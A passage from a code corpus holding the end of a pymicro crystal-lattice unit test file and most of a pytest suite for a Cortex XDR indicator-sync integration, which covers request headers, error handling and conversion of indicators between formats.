self.assertAlmostEqual(b[1], 0.405, 3)
self.assertAlmostEqual(b[2], 0., 3)
self.assertAlmostEqual(c[0], 0., 3)
self.assertAlmostEqual(c[1], 0., 3)
self.assertAlmostEqual(c[2], 0.683, 3)
p = HklPlane(1, 1, 1, Mg2Si)
Gc = p.scattering_vector()
self.assertAlmostEqual(Gc[0], 1.098, 3)
self.assertAlmostEqual(Gc[1], 2.469, 3)
self.assertAlmostEqual(Gc[2], 1.464, 3)
self.assertAlmostEqual(p.interplanar_spacing(), 0.325, 3)
Ghkl = np.dot(Mg2Si.matrix, Gc)
self.assertEqual(Ghkl[0], 1.) # h
self.assertEqual(Ghkl[1], 1.) # k
self.assertEqual(Ghkl[2], 1.) # l
def test_scattering_vector(self):
Fe_fcc = Lattice.face_centered_cubic(0.287) # FCC iron
hkl = HklPlane(2, 0, 0, Fe_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
Al_fcc = Lattice.face_centered_cubic(0.405)
hkl = HklPlane(0, 0, 2, lattice=Al_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
def test_scattering_vector_th(self):
""" compute the scattering vector using the formal definition and compare it with the components obtained
using the reciprocal lattice.
The formulae are available in the Laue Atlas p61, one typo in Eq. 6.1 was corrected. """
(a, b, c) = self.hex._lengths
(alpha, beta, gamma) = np.radians(self.hex._angles)
delta = pi / 2 - gamma
chi = gamma - atan((cos(alpha) - cos(gamma) * cos(beta)) / (cos(beta) * cos(delta)))
epsilon = pi / 2 - acos((cos(alpha) + cos(beta)) / (cos(chi) + cos(gamma - chi)))
psi = acos(sin(epsilon) * cos(delta + chi))
for (hp, kp, lp) in [(1, 1, 1), [1, 2, 0]]:
# compute the h, k, l in the Cartesian coordinate system
h = hp / a
k = (a / hp - b / kp * cos(gamma)) / (a / hp * b / kp * cos(delta))
l = (lp / c - hp / a * cos(beta) - kp / b * cos(psi)) / cos(epsilon)
Gc = HklPlane(hp, kp, lp, self.hex).scattering_vector()
self.assertAlmostEqual(Gc[0], h, 7)
self.assertAlmostEqual(Gc[1], k, 7)
self.assertAlmostEqual(Gc[2], l, 7)
def test_bragg_angle(self):
l = Lattice.cubic(0.287) # FCC iron
hkl = HklPlane(2, 0, 0, l) # 200 reflection at 8 keV is at 32.7 deg
self.assertAlmostEqual(hkl.bragg_angle(8), 0.5704164)
def test_4indices_representation(self):
h, k, l = HklPlane.four_to_three_indices(2, -1, -1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, -1)
self.assertEqual(l, 0)
h, k, l = HklPlane.four_to_three_indices(1, 0, -1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 0)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(1, 1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 1)
self.assertEqual(i, -2)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(2, 1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, 1)
self.assertEqual(i, -3)
self.assertEqual(l, 0)
class SlipSystemTests(unittest.TestCase):
def setUp(self):
print('testing the SlipSystem class')
def test_get_slip_system(self):
ss = SlipSystem.get_slip_systems('111')
self.assertEqual(len(ss), 12)
for s in ss:
n = s.get_slip_plane().normal()
l = s.get_slip_direction().direction()
self.assertAlmostEqual(np.dot(n, l), 0.)
ss = SlipSystem.get_slip_systems('112')
self.assertEqual(len(ss), 12)
for s in ss:
n = s.get_slip_plane().normal()
l = s.get_slip_direction().direction()
self.assertAlmostEqual(np.dot(n, l), 0.)
if __name__ == '__main__':
unittest.main()
| heprom/pymicro | pymicro/crystal/tests/test_Lattice.py | Python | mit | 15,718 | [
"CRYSTAL"
] | 266e405e9ec251da8033b563104cfe2a8b16dc81fe63181d04c0bfd08fe579b6 |
from XDR_iocs import *
import pytest
from freezegun import freeze_time
Client.severity = 'INFO'
client = Client({'url': 'https://example.com'})
def d_sort(in_dict):
return sorted(in_dict.items())
class TestGetHeaders:
@freeze_time('2020-06-01T00:00:00Z')
def test_sanity(self, mocker):
"""
Given:
- API key
- API key ID
Then:
- Verify headers created correct.
"""
params = {
"apikey_id": "7",
"apikey": "t3PkfrEhaRAD9a3r6Lq5cVPyqdMqtLd8cOJlSWUtbslkbERUgb2BTkSNRtDr3C6CWAgYqxvyzwDFJ83BLBgu1V2cxQY7rsoo2ks2u3W2aBL2BlteF8C8u75lCVUrNbv1" # noqa: E501
}
headers = {
'Authorization': 'da94963b561e3c95899d843b1284cecf410606e9e809be528ec1cf03880c6e9e',
'x-iocs-source': 'xsoar',
'x-xdr-auth-id': '7',
'x-xdr-nonce': '1111111111111111111111111111111111111111111111111111111111111111',
'x-xdr-timestamp': '1590969600000'
}
mocker.patch('secrets.choice', return_value='1')
output = get_headers(params)
assert output == headers, f'get_headers({params})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(headers)}'
def test_empty_case(self):
"""
Given:
Empty params
Then:
get_headers will not raise error
"""
get_headers({})
class TestHttpRequest:
def test_http_request_ok(self, requests_mock):
"""
Given:
- a client
When:
- http_request returns status code 200.
Then:
- do not raise an error
"""
requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=200, json={})
client.http_request(url_suffix='suffix', requests_kwargs={})
@pytest.mark.parametrize('status_code', client.error_codes.keys())
def test_http_request_error(self, requests_mock, status_code):
"""
Given:
- Status code
When:
- http_request returns this status code.
Then:
- Verify error message.
- Verify exception.res status code matches the http status code.
"""
with pytest.raises(DemistoException) as e:
requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=status_code)
client.http_request('suffix', requests_kwargs={})
assert e.value.message == client.error_codes[status_code]
assert e.value.res.status_code == status_code
def test_http_request_bad_json(self, requests_mock):
"""
Given:
- a client
When:
- http_request returns a response that is not a json.
Then:
- Verify error message.
- Verify demisto exception
"""
text = 'not a json'
with pytest.raises(DemistoException) as e:
requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=200, text=text)
client.http_request('suffix', requests_kwargs={})
assert e.value.message == f'Could not parse json out of {text}'
assert e.value.res.status_code == 200
assert isinstance(e.value.exception, json.JSONDecodeError)
assert e.value.exception.args == ('Expecting value: line 1 column 1 (char 0)',)
class TestGetRequestsKwargs:
def test_with_file(self, mocker):
"""
Given:
- file to upload
Then:
- Verify output format.
"""
def override_open(open_path, *_other):
return open_path
mocker.patch('builtins.open', side_effect=override_open)
path = '/Users/some_user/some_dir/some_file.file'
output = get_requests_kwargs(file_path=path)
expected_output = {'files': [('file', ('iocs.json', path, 'application/json'))]}
assert output == expected_output, f'get_requests_kwargs(file_path={path})\n\treturns: {output}\n\t instead: {expected_output}' # noqa: E501
def test_with_json(self):
"""
Given:
- simple json
Then:
- the json ready to send
"""
_json = {'test': 'test'}
output = get_requests_kwargs(_json=_json)
expected_output = {'data': '{"request_data": {"test": "test"}}'}
assert output == expected_output, f'get_requests_kwargs(_json={_json})\n\treturns: {output}\n\t instead: {expected_output}' # noqa: E501
class TestPrepareCommands:
def test_prepare_get_changes(self):
"""
Given:
- get changes command
Then:
- Verify url and json format.
"""
ts = int(datetime.now(timezone.utc).timestamp() * 1000)
url_suffix, _json = prepare_get_changes(ts)
assert url_suffix == 'get_changes', f'prepare_get_changes\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: get_changes' # noqa: E501
assert _json == {'last_update_ts': ts}
def test_prepare_enable_iocs(self):
"""
Given:
- enable iocs command
Then:
- Verify url and json format.
"""
url_suffix, iocs = prepare_enable_iocs('8.8.8.8,domain.com')
assert url_suffix == 'enable_iocs', f'prepare_enable_iocs\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: enable_iocs' # noqa: E501
assert iocs == ['8.8.8.8', 'domain.com']
def test_prepare_disable_iocs(self):
"""
Given:
- disable iocs command
Then:
- Verify url and json format.
"""
url_suffix, iocs = prepare_disable_iocs('8.8.8.8,domain.com')
assert url_suffix == 'disable_iocs', f'prepare_disable_iocs\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: disable_iocs' # noqa: E501
assert iocs == ['8.8.8.8', 'domain.com']
class TestCreateFile:
path = 'test_data/sync_file_test.json'
data_test_create_file_sync = [
('Domain_iocs', 'Domain_sync_file'),
('IP_iocs', 'IP_sync_file'),
('File_iocs', 'File_sync_file')
]
data_test_create_file_iocs_to_keep = [
('Domain_iocs', 'Domain_iocs_to_keep_file'),
('IP_iocs', 'IP_iocs_to_keep_file'),
('File_iocs', 'File_iocs_to_keep_file')
]
def setup(self):
# creates the file
with open(TestCreateFile.path, 'w') as _file:
_file.write('')
def teardown(self):
# removes the file when done
os.remove(TestCreateFile.path)
@staticmethod
def get_file(path):
with open(path, 'r') as _file:
return _file.read()
@staticmethod
def get_all_iocs(go_over, extension):
iocs = []
total = 0
data = []
for in_iocs, out_iocs in go_over:
ioc = json.loads(TestCreateFile.get_file(f'test_data/{in_iocs}.json'))
iocs.extend(ioc['iocs'])
total += ioc['total']
data.append(TestCreateFile.get_file(f'test_data/{out_iocs}.{extension}'))
all_iocs = {'iocs': iocs, 'total': total}
all_data = ''.join(data)
return all_iocs, all_data
def test_create_file_sync_without_iocs(self, mocker):
"""
Given:
- Sync command
When:
- there is no iocs
Then:
- Verify sync file data.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value={})
create_file_sync(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
expected_data = ''
assert data == expected_data, f'create_file_sync with no iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
@pytest.mark.parametrize('in_iocs, out_iocs', data_test_create_file_sync)
def test_create_file_sync(self, in_iocs, out_iocs, mocker):
"""
Given:
- Sync command
When:
- iocs type is a specific type.
Then:
- Verify sync file data.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value=json.loads(self.get_file(f'test_data/{in_iocs}.json'))) # noqa: E501
create_file_sync(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
expected_data = self.get_file(f'test_data/{out_iocs}.txt')
assert data == expected_data, f'create_file_sync with {in_iocs} iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
def test_create_file_sync_all_types(self, mocker):
"""
Given:
- Sync command
When:
- iocs as all types
Then:
- Verify sync file data.
"""
all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_sync, 'txt')
mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
create_file_sync(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
assert data == expected_data, f'create_file_sync with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
data_test_create_file_with_empty_indicators = [
{},
{'value': '11.11.11.11'},
{'indicator_type': 'IP'}
]
@pytest.mark.parametrize('defective_indicator', data_test_create_file_with_empty_indicators)
def test_create_file_sync_with_empty_indicators(self, defective_indicator, mocker):
"""
Given:
- Sync command
When:
- a part iocs dont have all required data
Then:
- Verify sync file data.
"""
all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_sync, 'txt')
all_iocs['iocs'].append(defective_indicator)
all_iocs['total'] += 1
mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
warnings = mocker.patch.object(demisto, 'debug')
create_file_sync(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
assert data == expected_data, f'create_file_sync with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
error_msg = warnings.call_args.args[0]
assert error_msg.startswith("unexpected IOC format in key: '"), f"create_file_sync empty message\n\tstarts: {error_msg}\n\tinstead: unexpected IOC format in key: '" # noqa: E501
assert error_msg.endswith(f"', {str(defective_indicator)}"), f"create_file_sync empty message\n\tends: {error_msg}\n\tinstead: ', {str(defective_indicator)}" # noqa: E501
def test_create_file_iocs_to_keep_without_iocs(self, mocker):
"""
Given:
- iocs to keep command
When:
- there is no iocs
Then:
- Verify iocs to keep file data.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value={})
create_file_iocs_to_keep(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
expected_data = ''
assert data == expected_data, f'create_file_iocs_to_keep with no iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
@pytest.mark.parametrize('in_iocs, out_iocs', data_test_create_file_iocs_to_keep)
def test_create_file_iocs_to_keep(self, in_iocs, out_iocs, mocker):
"""
Given:
- iocs to keep command
When:
- iocs type is a specific type.
Then:
- Verify iocs to keep file data.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value=json.loads(
self.get_file(f'test_data/{in_iocs}.json')))
create_file_iocs_to_keep(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
expected_data = self.get_file(f'test_data/{out_iocs}.txt')
assert data == expected_data, f'create_file_iocs_to_keep with {in_iocs} iocs\n\tcreates: {data}\n\tinstead: {expected_data}' # noqa: E501
def test_create_file_iocs_to_keep_all_types(self, mocker):
"""
Given:
- iocs to keep command
When:
- iocs as all types
Then:
- Verify iocs to keep file data.
"""
all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_iocs_to_keep, 'txt')
mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
create_file_iocs_to_keep(TestCreateFile.path)
data = self.get_file(TestCreateFile.path)
assert data == expected_data, f'create_file_iocs_to_keep with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
class TestDemistoIOCToXDR:
data_test_demisto_expiration_to_xdr = [
(None, -1),
('', -1),
('0001-01-01T00:00:00Z', -1),
('2020-06-03T00:00:00Z', 1591142400000)
]
@pytest.mark.parametrize('demisto_expiration, xdr_expiration', data_test_demisto_expiration_to_xdr)
def test_demisto_expiration_to_xdr(self, demisto_expiration, xdr_expiration):
"""
Given:
- demisto indicator expiration
Then:
- Verify XDR expiration.
"""
output = demisto_expiration_to_xdr(demisto_expiration)
assert xdr_expiration == output, f'demisto_expiration_to_xdr({demisto_expiration})\n\treturns: {output}\n\tinstead: {xdr_expiration}' # noqa: E501
data_test_demisto_reliability_to_xdr = [
(None, 'F'),
('A - Completely reliable', 'A'),
('B - Usually reliable', 'B'),
('C - Fairly reliable', 'C'),
('D - Not usually reliable', 'D'),
('E - Unreliable', 'E'),
('F - Reliability cannot be judged', 'F')
]
@pytest.mark.parametrize('demisto_reliability, xdr_reliability', data_test_demisto_reliability_to_xdr)
def test_demisto_reliability_to_xdr(self, demisto_reliability, xdr_reliability):
"""
Given:
- demisto indicator reliability
Then:
- Verify XDR reliability.
"""
output = demisto_reliability_to_xdr(demisto_reliability)
assert output == xdr_reliability, f'demisto_reliability_to_xdr({demisto_reliability})\n\treturns: {output}\n\tinstead: {xdr_reliability}' # noqa: E501
data_test_demisto_types_to_xdr = [
('File', 'HASH'),
('IP', 'IP'),
('Domain', 'DOMAIN_NAME')
]
@pytest.mark.parametrize('demisto_type, xdr_type', data_test_demisto_types_to_xdr)
def test_demisto_types_to_xdr(self, demisto_type, xdr_type):
"""
Given:
- demisto indicator type
Then:
- Verify XDR type.
"""
output = demisto_types_to_xdr(demisto_type)
assert output == xdr_type, f'demisto_reliability_to_xdr({demisto_type})\n\treturns: {output}\n\tinstead: {xdr_type}'
data_test_demisto_vendors_to_xdr = [
(
{'moduleID': {'sourceBrand': 'test', 'reliability': 'A - Completely reliable', 'score': 2}},
{'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}
),
(
{'moduleID': {'reliability': 'A - Completely reliable', 'score': 2}},
{'vendor_name': 'moduleID', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}
),
(
{'moduleID': {'sourceBrand': 'test', 'score': 2}},
{'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'F'}
),
(
{'moduleID': {'reliability': 'A - Completely reliable', 'score': 0}},
{'vendor_name': 'moduleID', 'reputation': 'UNKNOWN', 'reliability': 'A'}
)
]
@pytest.mark.parametrize('demisto_vendor, xdr_vendor', data_test_demisto_vendors_to_xdr)
def test_demisto_vendors_to_xdr(self, demisto_vendor, xdr_vendor):
"""
Given:
- demisto indicator vendors reports.
Then:
- Verify XDR vendors format.
"""
output = demisto_vendors_to_xdr(demisto_vendor)[0]
assert output == xdr_vendor, f'demisto_vendors_to_xdr({demisto_vendor})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(xdr_vendor)}' # noqa: E501
data_test_demisto_ioc_to_xdr = [
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
'type': 'IP'}
),
(
{'value': '11.11.11.11', 'indicator_type': 100, 'score': 2},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO', 'type': '100'}
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP'},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'}
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'expiration': '2020-06-03T00:00:00Z'},
{'expiration_date': 1591142400000, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'} # noqa: E501
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentTimeLine', 'content': 'test'}]}, # noqa: E501
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'}
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentRegular', 'content': 'test'}]}, # noqa: E501
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'comment': 'test'} # noqa: E501
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentRegular', 'content': 'test'}, {'type': 'IndicatorCommentRegular', 'content': 'this is the comment'}]}, # noqa: E501
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'comment': 'this is the comment'} # noqa: E501
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'aggregatedReliability': 'A - Completely reliable'},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'reliability': 'A'} # noqa: E501
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'CustomFields': {'threattypes': {'threatcategory': 'Malware'}}}, # noqa: E501
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'class': 'Malware'} # noqa: E501
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'moduleToFeedMap': {'module': {'sourceBrand': 'test', 'score': 2}}}, # noqa: E501
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'vendors': [{'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'F'}]} # noqa: E501
)
]
@pytest.mark.parametrize('demisto_ioc, xdr_ioc', data_test_demisto_ioc_to_xdr)
def test_demisto_ioc_to_xdr(self, demisto_ioc, xdr_ioc):
"""
Given:
- demisto indicator.
Then:
- Verify XDR indicator format.
"""
output = demisto_ioc_to_xdr(demisto_ioc)
assert output == xdr_ioc, f'demisto_ioc_to_xdr({demisto_ioc})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(xdr_ioc)}' # noqa: E501
def test_empty_demisto_ioc_to_xdr(self, mocker):
warnings = mocker.patch.object(demisto, 'debug')
output = demisto_ioc_to_xdr({})
assert output == {}, 'demisto_ioc_to_xdr({})\n\treturns: ' + str(d_sort(output)) + '\n\tinstead: {}'
assert warnings.call_args.args[0] == "unexpected IOC format in key: 'value', {}"
class TestXDRIOCToDemisto:
data_test_xdr_expiration_to_demisto = [
(-1, 'Never'),
(1591142400000, '2020-06-03T00:00:00Z'),
(1592142400000, '2020-06-14T13:46:40Z')
]
@pytest.mark.parametrize('xdr_expiration, demisto_expiration', data_test_xdr_expiration_to_demisto)
def test_xdr_expiration_to_demisto(self, xdr_expiration, demisto_expiration):
"""
Given:
- expiration in XDR format.
Then:
- expiration in demisto format.
"""
output = xdr_expiration_to_demisto(xdr_expiration)
assert output == demisto_expiration, f'xdr_expiration_to_demisto({xdr_expiration})\n\treturns: {output}\n\tinstead: {demisto_expiration}' # noqa: E501
data_test_xdr_ioc_to_demisto = [
(
{
'RULE_ID': 863, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
'RULE_STATUS': 'DISABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801230, 'BS_RETRIES': 1,
'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'HASH',
'RULE_INDICATOR': 'fa66f1e0e318b6d7b595b6cee580dc0d8e4ac38fbc8dbfcac6ad66dbe282832e', 'REPUTATION': 'GOOD', # noqa: E501
'RELIABILITY': None, 'VENDORS': None, 'KLASS': None, 'IS_DEFAULT_TTL': False, 'RULE_TTL': -1,
'MARKED_DELETED': 0
},
{
'value': 'fa66f1e0e318b6d7b595b6cee580dc0d8e4ac38fbc8dbfcac6ad66dbe282832e',
'type': 'File',
'score': 1,
'fields': {
'expirationdate': 'Never',
'tags': 'Cortex XDR',
'xdrstatus': 'disabled'
}
}
),
(
{
'RULE_ID': 861, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
'RULE_STATUS': 'DISABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801784, 'BS_RETRIES': 1,
'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'DOMAIN_NAME', 'RULE_INDICATOR': 'test.com', 'REPUTATION': 'GOOD', # noqa: E501
'RELIABILITY': None, 'VENDORS': None, 'KLASS': None, 'IS_DEFAULT_TTL': False, 'RULE_TTL': -1,
'MARKED_DELETED': 0
},
{
'value': 'test.com',
'type': 'Domain',
'score': 1,
'fields': {
'expirationdate': 'Never',
'tags': 'Cortex XDR',
'xdrstatus': 'disabled'
}
}
),
(
{
'RULE_ID': 862, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
'RULE_STATUS': 'ENABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801784, 'BS_RETRIES': 1,
'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'DOMAIN_NAME', 'RULE_INDICATOR': 'test.co.il',
'REPUTATION': 'SUSPICIOUS', 'RELIABILITY': 'A',
'VENDORS': [{'vendor_name': 'Cortex XDR - IOC', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}],
'KLASS': None,
'IS_DEFAULT_TTL': False, 'RULE_TTL': -1, 'MARKED_DELETED': 0
},
{
'value': 'test.co.il',
'type': 'Domain',
'score': 2,
'fields': {
'expirationdate': 'Never',
'tags': 'Cortex XDR',
'xdrstatus': 'enabled'
}
}
)
]
@pytest.mark.parametrize('xdr_ioc, demisto_ioc', data_test_xdr_ioc_to_demisto)
def test_xdr_ioc_to_demisto(self, xdr_ioc, demisto_ioc, mocker):
"""
Given:
- IOC in XDR format.
Then:
- IOC in demisto format.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value={})
output = xdr_ioc_to_demisto(xdr_ioc)
del output['rawJSON']
assert output == demisto_ioc, f'xdr_ioc_to_demisto({xdr_ioc})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(demisto_ioc)}' # noqa: E501
class TestCommands:
# test commands full flow
class TestIOCSCommand:
def test_iocs_command_with_enable(self, mocker):
"""
Given:
- enable command
Then:
- Verify enable command is called.
"""
mocker.patch.object(demisto, 'command', return_value='xdr-iocs-enable')
mocker.patch.object(demisto, 'args', return_value={'indicator': '11.11.11.11'})
mocker.patch('XDR_iocs.Client.http_request', return_value={})
outputs = mocker.patch('XDR_iocs.return_outputs')
enable_ioc = mocker.patch('XDR_iocs.prepare_enable_iocs', side_effect=prepare_enable_iocs)
iocs_command(client)
output = outputs.call_args.args[0]
assert output == 'indicators 11.11.11.11 enabled.', f'enable command\n\tprints: {output}\n\tinstead: indicators 11.11.11.11 enabled.' # noqa: E501
assert enable_ioc.call_count == 1, 'enable command not called'
def test_iocs_command_with_disable(self, mocker):
"""
Given:
- disable command
Then:
- Verify disable command is called.
"""
mocker.patch.object(demisto, 'command', return_value='xdr-iocs-disable')
mocker.patch.object(demisto, 'args', return_value={'indicator': '11.11.11.11'})
mocker.patch('XDR_iocs.Client.http_request', return_value={})
outputs = mocker.patch('XDR_iocs.return_outputs')
disable_ioc = mocker.patch('XDR_iocs.prepare_disable_iocs', side_effect=prepare_disable_iocs)
iocs_command(client)
output = outputs.call_args.args[0]
assert output == 'indicators 11.11.11.11 disabled.', f'disable command\n\tprints: {output}\n\tinstead: indicators 11.11.11.11 disabled.' # noqa: E501
assert disable_ioc.call_count == 1, 'disable command not called'
def test_sync(self, mocker):
http_request = mocker.patch.object(Client, 'http_request')
iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
mocker.patch.object(demisto, 'searchIndicators', returnvalue=iocs)
mocker.patch('XDR_iocs.return_outputs')
sync(client)
assert http_request.call_args.args[0] == 'sync_tim_iocs', 'sync command url changed'
def test_get_sync_file(self, mocker):
iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
mocker.patch.object(demisto, 'searchIndicators', returnvalue=iocs)
return_results_mock = mocker.patch('XDR_iocs.return_results')
get_sync_file()
assert return_results_mock.call_args[0][0]['File'] == 'xdr-sync-file'
def test_set_sync_time(self, mocker):
mocker_reurn_results = mocker.patch('XDR_iocs.return_results')
mocker_set_context = mocker.patch.object(demisto, 'setIntegrationContext')
set_sync_time('2021-11-25T00:00:00')
mocker_reurn_results.assert_called_once_with('set sync time to 2021-11-25T00:00:00 seccedded.')
call_args = mocker_set_context.call_args[0][0]
assert call_args['ts'] == 1637798400000
assert call_args['time'] == '2021-11-25T00:00:00Z'
assert call_args['iocs_to_keep_time']
def test_set_sync_time_with_invalid_time(self):
with pytest.raises(ValueError, match='invalid time format.'):
set_sync_time('test')
@freeze_time('2020-06-03T02:00:00Z')
def test_iocs_to_keep(self, mocker):
http_request = mocker.patch.object(Client, 'http_request')
iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_iocs_to_keep, 'txt')
mocker.patch.object(demisto, 'searchIndicators', returnvalue=iocs)
mocker.patch('XDR_iocs.return_outputs')
iocs_to_keep(client)
assert http_request.call_args.args[0] == 'iocs_to_keep', 'iocs_to_keep command url changed'
def test_tim_insert_jsons(self, mocker):
http_request = mocker.patch.object(Client, 'http_request')
mocker.patch.object(demisto, 'getIntegrationContext', return_value={'time': '2020-06-03T00:00:00Z'})
iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
mocker.patch('XDR_iocs.return_outputs')
tim_insert_jsons(client)
assert http_request.call_args.kwargs['url_suffix'] == 'tim_insert_jsons/', 'tim_insert_jsons command url changed'
def test_get_changes(self, mocker):
mocker.patch.object(demisto, 'getIntegrationContext', return_value={'ts': 1591142400000})
mocker.patch.object(demisto, 'createIndicators')
mocker.patch.object(demisto, 'searchIndicators', return_value={})
xdr_res = {'reply': list(map(lambda xdr_ioc: xdr_ioc[0], TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto))}
mocker.patch.object(Client, 'http_request', return_value=xdr_res)
get_changes(client)
xdr_ioc_to_timeline(list(map(lambda x: str(x[0].get('RULE_INDICATOR')), TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto))) # noqa: E501
class TestParams:
tags_test = [
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
'type': 'IP'},
{'tlp_color': ''},
'Cortex XDR',
None
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
'type': 'IP'},
{'tag': 'tag1'},
'tag1',
None
),
(
{'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
{'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
'type': 'IP'},
{'feedTags': 'tag2', 'tlp_color': 'AMBER'},
'tag2',
'AMBER'
)
]
@pytest.mark.parametrize('demisto_ioc, xdr_ioc, param_value, expected_tags, expected_tlp_color', tags_test)
def test_feed_tags_and_tlp_color(self, demisto_ioc, xdr_ioc, param_value, expected_tags, expected_tlp_color, mocker):
"""
Given:
- IOC in XDR format.
Then:
- IOC in demisto format.
"""
mocker.patch.object(demisto, 'searchIndicators', return_value={})
mocker.patch.object(demisto, 'params', return_value=param_value)
mocker.patch.object(demisto, 'getIntegrationContext', return_value={'ts': 1591142400000})
mocker.patch.object(demisto, 'searchIndicators', return_value={})
outputs = mocker.patch.object(demisto, 'createIndicators')
